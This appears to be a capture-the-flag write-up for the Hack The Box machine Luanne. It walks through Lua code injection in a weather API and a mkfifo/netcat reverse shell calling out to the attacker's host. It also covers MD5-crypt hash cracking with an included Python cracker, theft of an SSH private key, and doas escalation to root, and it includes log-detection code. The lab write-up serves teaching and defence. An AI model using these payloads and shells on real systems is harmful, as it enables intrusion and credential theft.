Luanne-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: code injection, MD5-crypt hash cracking, directory enumeration, default credentials, process analysis, the netpgp tool, doas privilege escalation

Reference: https://www.jgeek.cn/article/89

Reference: https://r0ck-blog.github.io/2021/04/01/luanne/

0x01 Obtaining user access

1. Target IP address: 10.10.10.218

2. Check connectivity to the target

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.218 -c 4
PING 10.10.10.218 (10.10.10.218) 56(84) bytes of data.
64 bytes from 10.10.10.218: icmp_seq=1 ttl=254 time=280 ms
64 bytes from 10.10.10.218: icmp_seq=2 ttl=254 time=294 ms
64 bytes from 10.10.10.218: icmp_seq=3 ttl=254 time=278 ms
64 bytes from 10.10.10.218: icmp_seq=4 ttl=254 time=275 ms

--- 10.10.10.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 274.766/281.735/294.153/7.386 ms

3. Enumerate open ports. Note the retransmission warning in the full-port scan: at roughly 280 ms RTT, --min-rate=10000 is aggressive, and nmap reports 58749 ports as filtered (no response), so a missed port is possible. A slower rerun of -p- is the sanity check before concluding that only 22, 80 and 9001 are open.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG braker-allports 10.10.10.218
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 22:03 CST
Warning: 10.10.10.218 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.218
Host is up (0.29s latency).
Not shown: 58749 filtered tcp ports (no-response), 6783 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9001/tcp open tor-orport

Nmap done: 1 IP address (1 host up) scanned in 72.92 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' braker-allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,9001,
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,9001 10.10.10.218
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 22:07 CST
Nmap scan report for 10.10.10.218
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
|_http-title: Error response
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.52 seconds

4. Port 80 answers with a 401 Basic-auth challenge, and so does port 9001. The nmap scan identified 9001 as Supervisor process manager, so we search for its default credentials

supervisor process manager default password

5. The default credentials username = user, password = 123 log us into the Supervisor web interface

6. Nothing further of use was found there. Continuing with directory enumeration on port 80, robots.txt leaks some information

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.218/robots.txt
User-agent: *
Disallow: /weather #returning 404 but still harvesting cities

7. Further directory scanning found nothing useful, owing to my network conditions and wordlist. Consulting the reference writeup revealed the /forecast endpoint; the following is quoted from that writeup

Let's look at http://luanne/weather/forecast.

The JSON document says we need to use a parameter called city to get more data. By executing city=list I can get all available cities, and then I can get the forecast for a specific city by executing city=London.

I know from port 9001 that there is a Lua script behind it, so my guess is that we should try the city parameter and see whether it is vulnerable.

For this I like to use ZAP Proxy. My goal is to force the site to display an error message. The first test I like to do is to check whether the script sanitizes input properly. So I added a “” after the city name. Like this:

/forecast (Status: 200)

8. This endpoint returns weather information for a city, and the city parameter is injected into the Lua script unsanitized, which gives remote code execution

http://10.10.10.218/weather/forecast?city=%27)%20os.execute(%27id%27)--+--

9. The request above confirms that commands execute directly. The payload shape `') os.execute('id')-- --` shows why: the city value lands inside a single-quoted Lua string, so `')` closes that string and the enclosing call, `os.execute('id')` runs our command, and `--` turns the rest of the original line into a Lua comment. Next we get an initial shell with a named-pipe reverse shell (NetBSD has no bash, so /bin/sh is used)

/weather/forecast?city=')+os.execute('rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.2+443+>/tmp/f')--%2b--

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65493
sh: can't access tty; job control turned off
$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
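To make the injection mechanics concrete, here is an added example (not code from the original post or from the box): it assembles the query string used above, reproduces the mkfifo reverse-shell command from step 9, and scans nginx access-log lines for city values that carry a quote-break or a Lua call, which is what a defender would look for after this attack. The log lines are constructed for the example and modelled on the requests in this writeup; the vulnerable weather.lua itself is not reproduced.

```python
"""Lua string-context injection in the /weather/forecast city parameter:
payload assembly and log-side detection. Added example, not code from the
original post; the vulnerable weather.lua is not reproduced here.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

FORECAST_PATH = "/weather/forecast"


def lua_inject_query(cmd: str) -> str:
    """Query string for the injection used in the writeup.

    The city value is spliced into Lua source inside a single-quoted string,
    so  ')  closes that string and the call around it, os.execute(cmd) runs
    our command, and  --  comments out whatever Lua followed the injection.
    urlencode() applies the same percent-encoding the browser request shows."""
    payload = f"') os.execute('{cmd}')-- --"
    return urlencode({"city": payload})


def mkfifo_revshell(lhost: str, lport: int, fifo: str = "/tmp/f") -> str:
    """Named-pipe reverse shell from step 9 (NetBSD has no bash, hence /bin/sh)."""
    return (f"rm {fifo};mkfifo {fifo};cat {fifo}|/bin/sh -i 2>&1"
            f"|nc {lhost} {lport} >{fifo}")


# Lua calls that should never appear in a city name
LUA_INDICATORS = re.compile(
    r"\b(?:os\.execute|io\.popen|load(?:string)?|dofile|require)\s*\(")
# nginx combined log prefix: client, ident, user, [time] "METHOD target
LOG_PREFIX = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')


def suspicious_city_requests(access_log: str):
    """(client, decoded city) for forecast requests whose city value carries
    a quote-break or a Lua call. parse_qs decodes %27 and + for us."""
    hits = []
    for line in access_log.splitlines():
        m = LOG_PREFIX.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != FORECAST_PATH:
            continue
        for city in parse_qs(url.query).get("city", []):
            if "')" in city or LUA_INDICATORS.search(city):
                hits.append((client, city))
    return hits


# Constructed access-log lines modelled on the requests in this writeup
SAMPLE_LOG = """\
10.10.14.2 - - [23/Dec/2023:22:10:01 +0800] "GET /weather/forecast?city=London HTTP/1.1" 200 312 "-" "curl/8.5.0"
10.10.14.2 - - [23/Dec/2023:22:11:44 +0800] "GET /weather/forecast?city=%27)%20os.execute(%27id%27)--+-- HTTP/1.1" 200 98 "-" "Mozilla/5.0"
10.10.14.2 - - [23/Dec/2023:22:12:03 +0800] "GET /weather/forecast?city=list HTTP/1.1" 200 201 "-" "curl/8.5.0"
"""

if __name__ == "__main__":
    print(lua_inject_query("id"))
    print(mkfifo_revshell("10.10.14.2", 443))
    print(suspicious_city_requests(SAMPLE_LOG))
```

The detector deliberately decodes the query before matching: the raw log line only shows `%27)%20os.execute(...)`, and a rule that greps the undecoded URL would miss the same payload sent with different encoding.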

10. Enumeration shows that the user flag lives in /home/r.michaels, which is mode dr-xr-x--- (owner and group users only), so _httpd cannot read it; we need r.michaels's privileges. python3 is not on _httpd's PATH (the pty-upgrade trick fails), although the ps listing later on shows /usr/pkg/bin/python3.8 running supervisord

$ ls
index.html
robots.txt
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ls -la /home
total 12
drwxr-xr-x 3 root wheel 512 Sep 14 2020 .
drwxr-xr-x 21 root wheel 512 Sep 16 2020 ..
dr-xr-x--- 7 r.michaels users 512 Sep 16 2020 r.michaels
$ cat r.michaels
cat: r.michaels: No such file or directory
$ cat /home/r.michaels
cat: /home/r.michaels: Permission denied
$ ls /home/r.michaels
ls: r.michaels: Permission denied
$

11. In the web root /var/www, .htpasswd contains a password hash for webapi_user. The $1$ prefix marks MD5-crypt, a salted, iterated scheme, not a raw MD5 digest

$ pwd
/var/www
$ ls -la
total 20
drwxr-xr-x 2 root wheel 512 Nov 25 2020 .
drwxr-xr-x 24 root wheel 512 Nov 24 2020 ..
-rw-r--r-- 1 root wheel 47 Sep 16 2020 .htpasswd
-rw-r--r-- 1 root wheel 386 Sep 17 2020 index.html
-rw-r--r-- 1 root wheel 78 Nov 25 2020 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
$

12. The hash cracks on the somd5 website to: iamthebest

13. This password does not let us switch to the target user, so it is presumably used somewhere else

14. Listing r.michaels's processes reveals a second bozohttpd (/usr/libexec/httpd) instance bound to 127.0.0.1:3001. Per its arguments in the ps -auxwww output it runs as r.michaels (-U r.michaels), with ~user translation (-u) and directory indexing (-X) enabled, and serves the development copy /home/r.michaels/devel/webapi/weather.lua from /home/r.michaels/devel/www. The sockstat output is shown as captured; the ps listing is the clearer view of the listener

$ ps ax -U r.michaels
PID TTY STAT TIME COMMAND
204 ? Is 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L wea
591 ? I 0:00.08 sshd: r.michaels@pts/0 (sshd)
2776 pts/0 Is+ 0:00.03 -ksh
$

$ sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root syslogd 167 3 tcp *.etlservicemgr *.*
r.michaels httpd 204 3 tcp *.etlservicemgr *.*
r.michaels httpd 204 4 tcp *.etlservicemgr *.*
nginx nginx 239 7 tcp *.etlservicemgr *.*
nginx nginx 239 8 tcp *.etlservicemgr *.*
_httpd httpd 331 3 tcp *.etlservicemgr *.*
_httpd httpd 331 4 tcp *.etlservicemgr *.*
_httpd python3.8 339 6 tcp *.etlservicemgr *.*
_httpd python3.8 339 7 tcp *.etlservicemgr *.*
root nginx 345 3 tcp *.etlservicemgr *.*
root nginx 345 7 tcp *.etlservicemgr *.*
root nginx 345 8 tcp *.etlservicemgr *.*
root sshd 346 3 tcp *.etlservicemgr *.*
root sshd 346 5 tcp *.etlservicemgr *.*
root sshd 346 6 tcp *.etlservicemgr *.*
root sshd 346 7 tcp *.etlservicemgr *.*
r.michaels sshd 591 3 tcp *.etlservicemgr *.*
r.michaels sshd 591 4 tcp *.etlservicemgr *.*
r.michaels sshd 591 7 tcp *.etlservicemgr *.*
r.michaels sshd 591 9 tcp *.etlservicemgr *.*
root sshd 606 4 tcp *.etlservicemgr *.*
root sshd 606 5 tcp *.etlservicemgr *.*
root sshd 606 7 tcp *.etlservicemgr *.*
root sshd 606 9 tcp *.etlservicemgr *.*
_httpd httpd 2395 0 tcp *.etlservicemgr *.*
_httpd httpd 2395 1 tcp *.etlservicemgr *.*
_httpd httpd 2395 3 tcp *.etlservicemgr *.*
_httpd httpd 2395 4 tcp *.etlservicemgr *.*
_httpd cat 2397 0 tcp *.etlservicemgr *.*
_httpd cat 2397 4 tcp *.etlservicemgr *.*
_httpd nc 2424 3 tcp *.etlservicemgr *.*
_httpd nc 2424 4 tcp *.etlservicemgr *.*
_httpd sh 2516 0 tcp *.etlservicemgr *.*
_httpd sh 2516 1 tcp *.etlservicemgr *.*
_httpd sh 2516 4 tcp *.etlservicemgr *.*
_httpd sh 2518 4 tcp *.etlservicemgr *.*
_httpd sockstat 3013 4 tcp *.etlservicemgr *.*
$

$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
root 0 0.0 0.2 0 12812 ? OKl 2:01PM 0:01.47 [system]
root 1 0.0 0.0 23468 1528 ? Is 2:01PM 0:00.01 init
root 167 0.0 0.0 33848 2272 ? Ss 2:01PM 0:00.02 /usr/sbin/syslogd -s
r.michaels 204 0.0 0.0 37956 1976 ? Is 2:01PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
nginx 239 0.0 0.1 33924 3244 ? I 2:01PM 0:05.73 nginx: worker process
_httpd 289 0.0 0.0 19856 1528 ? O 2:48PM 0:00.00 ps -auxwww
root 304 0.0 0.0 19708 1344 ? Is 2:01PM 0:00.00 /usr/sbin/powerd
root 318 0.0 0.1 117948 7164 ? Il 2:01PM 0:02.87 /usr/pkg/bin/vmtoolsd
_httpd 331 0.0 0.0 34956 2000 ? Is 2:01PM 0:00.01 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
_httpd 339 0.0 0.3 118448 16240 ? Ss 2:01PM 0:01.47 /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8
root 345 0.0 0.0 33368 1828 ? Is 2:01PM 0:00.00 nginx: master process /usr/pkg/sbin/nginx
root 346 0.0 0.0 71348 2916 ? Is 2:01PM 0:00.01 /usr/sbin/sshd
root 402 0.0 0.0 20216 1648 ? Ss 2:01PM 0:00.01 /usr/sbin/cron
_httpd 420 0.0 0.0 19988 1648 ? S 2:01PM 0:00.05 /bin/sh /usr/local/scripts/memory.sh
_httpd 421 0.0 0.0 20020 1660 ? S 2:01PM 0:00.09 /bin/sh /usr/local/scripts/processes.sh
_httpd 426 0.0 0.0 19992 1656 ? S 2:01PM 0:00.04 /bin/sh /usr/local/scripts/uptime.sh
_httpd 478 0.0 0.0 18108 1388 ? S 2:48PM 0:00.00 sleep 30
_httpd 479 0.0 0.0 17636 1388 ? S 2:48PM 0:00.00 sleep 30
_httpd 645 0.0 0.0 17636 1380 ? S 2:48PM 0:00.00 sleep 30
_httpd 2395 0.0 0.0 35256 2328 ? I 2:41PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
_httpd 2397 0.0 0.0 15436 1280 ? S 2:41PM 0:00.00 cat /tmp/f
_httpd 2424 0.0 0.0 15952 1400 ? S 2:41PM 0:00.00 nc 10.10.14.2 443
_httpd 2516 0.0 0.0 23480 1712 ? I 2:41PM 0:00.00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f
_httpd 2518 0.0 0.0 20796 1720 ? S 2:41PM 0:00.01 /bin/sh -i
root 419 0.0 0.0 19784 1588 ttyE0 Is+ 2:01PM 0:00.00 /usr/libexec/getty Pc constty
root 407 0.0 0.0 19780 1584 ttyE1 Is+ 2:01PM 0:00.00 /usr/libexec/getty Pc ttyE1
root 390 0.0 0.0 19780 1580 ttyE2 Is+ 2:01PM 0:00.00 /usr/libexec/getty Pc ttyE2
root 433 0.0 0.0 19780 1588 ttyE3 Is+ 2:01PM 0:00.00 /usr/libexec/getty Pc ttyE3
$

15. At this point I reached a gap in my knowledge. The reference writeup explains that the local service is protected by authentication and that the password cracked above gets past it, exposing the information we need

Recall from the first part that the -u parameter maps URLs to local directories. This means we can browse local folders through the URL.

Traditionally on Unix systems the home directory of a particular user can be referred to as ~user/. The mod_userdir module extends this idea to the web by allowing files under each user's home directory to be accessed using URLs such as http://www.example.com/~user/file.html. For security reasons it is inappropriate to give direct access to a user's home directory from the web. Therefore the UserDir directive specifies a directory underneath the user's home directory where web files are located. Using the default setting of Userdir public_html, the above URL maps to a file at a directory like /home/user/public_html/file.html, where /home/user/ is the user's home directory as specified in /etc/passwd.

Basically, if I access the server and add ~r.michaels to the URL, I may be able to reach the public_html folder in r.michaels's home directory.

The first problem is that if I try to access http://127.0.0.1:3001, I get an unauthorized error. So we need to authorize ourselves to connect to the home page. If you remember, we did this the first time with these credentials:

- user: webapi_user - pw: iamthebest

With luck, the credentials on this instance are the same. By analysing the request we sent when connecting to the first instance, I can see that authorization is done by sending an additional header value (Authorization):

16. Use curl from the _httpd shell to list the local service with the .htpasswd credentials. With -u, bozohttpd maps /~r.michaels/ to r.michaels's public_html directory, and because this instance runs as r.michaels it can serve a directory (mode dr-x------) that _httpd itself cannot read

$ curl --user webapi_user:iamthebest "127.0.0.1:3001/~r.michaels/"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 601 0 601 0 0 146k 0 --:--:-- --:--:-- --:--:-- 146k
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
border-top: 1px solid black;
border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

17. The listing shows an id_rsa file; fetch it the same way

$ curl --user webapi_user:iamthebest "127.0.0.1:3001/~r.michaels/id_rsa"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2610 100 2610 0 0 637k 0 --:--:-- --:--:-- --:--:-- 637k
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
$

18. Save the key into a local file named id_rsa, then log in as r.michaels and read the first flag. The first ssh attempt fails because OpenSSH refuses a private key readable by group or others; chmod 600 fixes it

┌──(kali㉿kali)-[~/桌面]
└─$ touch id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ ssh r.michaels@10.10.10.218 -i id_rsa
The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
ED25519 key fingerprint is SHA256:CpUy86JD75uIN94DGIDjXPkDK7Rsu1Du3NtIfPctVnc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.218' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
r.michaels@10.10.10.218: Permission denied (publickey).

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/桌面]
└─$ ssh r.michaels@10.10.10.218 -i id_rsa
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ ls
backups devel public_html user.txt
luanne$ cat user.txt
ea5f0ce6a917b0be1eabc7f9218febc0

0x02 Obtaining root access

19. Looking through the home directory reveals an encrypted backup archive

luanne$ ls -la
total 52
dr-xr-x--- 7 r.michaels users 512 Sep 16 2020 .
drwxr-xr-x 3 root wheel 512 Sep 14 2020 ..
-rw-r--r-- 1 r.michaels users 1772 Feb 14 2020 .cshrc
drwx------ 2 r.michaels users 512 Sep 14 2020 .gnupg
-rw-r--r-- 1 r.michaels users 431 Feb 14 2020 .login
-rw-r--r-- 1 r.michaels users 265 Feb 14 2020 .logout
-rw-r--r-- 1 r.michaels users 1498 Feb 14 2020 .profile
-rw-r--r-- 1 r.michaels users 166 Feb 14 2020 .shrc
dr-x------ 2 r.michaels users 512 Sep 16 2020 .ssh
dr-xr-xr-x 2 r.michaels users 512 Nov 24 2020 backups
dr-xr-x--- 4 r.michaels users 512 Sep 16 2020 devel
dr-x------ 2 r.michaels users 512 Sep 16 2020 public_html
-r-------- 1 r.michaels users 33 Sep 16 2020 user.txt
luanne$
luanne$ cd backups
luanne$ ls -la
total 12
dr-xr-xr-x 2 r.michaels users 512 Nov 24 2020 .
dr-xr-x--- 7 r.michaels users 512 Sep 16 2020 ..
-r-------- 1 r.michaels users 1970 Nov 24 2020 devel_backup-2020-09-16.tar.gz.enc
luanne$

20. The .enc file is PGP-encrypted to r.michaels's key (the .gnupg directory in the home directory), so netpgp can decrypt it from this account. The output has to go somewhere writable: the home directory is mode dr-xr-x---, so even its owner cannot create files there, which is why /var/mail is used. Then extract the tarball.

When the decrypted format is unknown, an alternative is to decrypt with netpgp, base64-encode the result to move it intact, decode it back to binary and identify the format from its magic bytes (the file command, or a lookup on https://www.filesignatures.net/index.php). Here the file name already says it is a .tar.gz, so it is written straight to /var/mail and extracted. The netpgp output also identifies the key used: a 2048-bit RSA key, uid r.michaels@localhost.

netpgp --decrypt --output=/var/mail/backup.tar.gz ./devel_backup-2020-09-16.tar.gz.enc

cd /var/mail/ && tar -xvf backup.tar.gz

luanne$ pwd
/home/r.michaels/backups
luanne$ netpgp --decrypt --output=/var/mail/backup.tar.gz ./devel_backup-2020-09-16.tar.gz.enc
signature 2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
uid RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /var/mail/ && tar -xvf backup.tar.gz
x devel-2020-09-16/
x devel-2020-09-16/www/
x devel-2020-09-16/webapi/
x devel-2020-09-16/webapi/weather.lua
x devel-2020-09-16/www/index.html
x devel-2020-09-16/www/.htpasswd
luanne$ ls
backup.tar.gz devel-2020-09-16 r.michaels
luanne$ pwd
/var/mail
luanne$ cat devel-2020-09-16/www/.htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
luanne$

21. The backup's .htpasswd holds a second MD5-crypt hash (the $1$ prefix is md5crypt, the salted 1000-round scheme: hashcat -m 500 or john --format=md5crypt, not a plain MD5 digest). It cracks to: littlebear
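The two webapi_user hashes (step 11 and the backup above) share the $1$ prefix, so here is an added example (not code from the original post) that implements MD5-crypt in pure Python, verifies both hashes against the cracked passwords, and runs a small wordlist the way a cracker would. The wordlist is constructed for the example; the hashes are the two from this writeup.

```python
"""MD5-crypt ($1$) verification for .htpasswd entries. Added example, not
code from the original post. The "$1$" prefix is md5crypt (FreeBSD's
salted, 1000-round MD5 scheme; hashcat -m 500, john --format=md5crypt),
so hashlib.md5(b"iamthebest").hexdigest() will never match these hashes.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Both entries as they appear in this writeup
HTPASSWD_LIVE = "webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0"
HTPASSWD_BACKUP = "webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu."

# Constructed wordlist for the demo (a real run would use rockyou or similar)
WORDLIST = ["password", "123456", "webapi", "iamthebest", "luanne", "littlebear"]


def _to64(value: int, length: int) -> str:
    """md5crypt's own base64: 6 bits per char, least significant first."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(length))


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    pw = password.encode()
    salt_b = salt.encode()[:8]  # at most 8 salt characters are used
    ctx = hashlib.md5(pw + magic.encode() + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    # feed MD5(pw, salt, pw) into ctx, one byte per password byte
    n = len(pw)
    while n > 0:
        ctx.update(alt[: min(16, n)])
        n -= 16
    # for each bit of len(pw): a NUL byte if set, else the first password byte
    n = len(pw)
    while n:
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    # 1000 rounds whose input order depends on the round number
    for i in range(1000):
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    # 22 output characters from the 16 digest bytes in md5crypt's order
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in groups)
    out += _to64(final[11], 2)
    return f"{magic}{salt_b.decode()}${out}"


def verify(password: str, hashed: str) -> bool:
    """Constant-time compare of the candidate against a $1$salt$hash string."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an MD5-crypt ($1$) hash")
    return hmac.compare_digest(md5crypt(password, parts[2]), hashed)


def crack(htpasswd_line: str, wordlist):
    """Return (user, password) for the first wordlist hit, or (user, None)."""
    user, _, hashed = htpasswd_line.partition(":")
    for candidate in wordlist:
        if verify(candidate, hashed):
            return user, candidate
    return user, None


if __name__ == "__main__":
    for line in (HTPASSWD_LIVE, HTPASSWD_BACKUP):
        print(crack(line, WORDLIST))
```

Two points worth taking from this: the 1000 rounds are why an online rainbow-table lookup only works when the password is common, and the per-entry salt means the two hashes cannot be compared to each other even though they belong to the same user name; each has to be attacked separately, which is exactly what happened here.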

22. Running linpeas.sh lists /usr/pkg/bin/doas under useful software, so doas is installed on the box

==================== Useful software
/usr/pkg/bin/doas

23. doas executes a command as another user. It prompts for the invoking user's password, and the password cracked from the backup (littlebear) is also r.michaels's login password, so password reuse hands us a root shell and the final flag. The rule that allows this lives in doas.conf (/usr/pkg/etc/doas.conf for the pkgsrc package on NetBSD); reading it is the way to confirm which commands are permitted, and whether nopass is set, before assuming a password is needed

luanne$ doas -u root su
Password:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66
#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/302


https://sh1yan.top/2023/12/22/Luanne-htb-writeup/
Author: shiyan
Published: 22 December 2023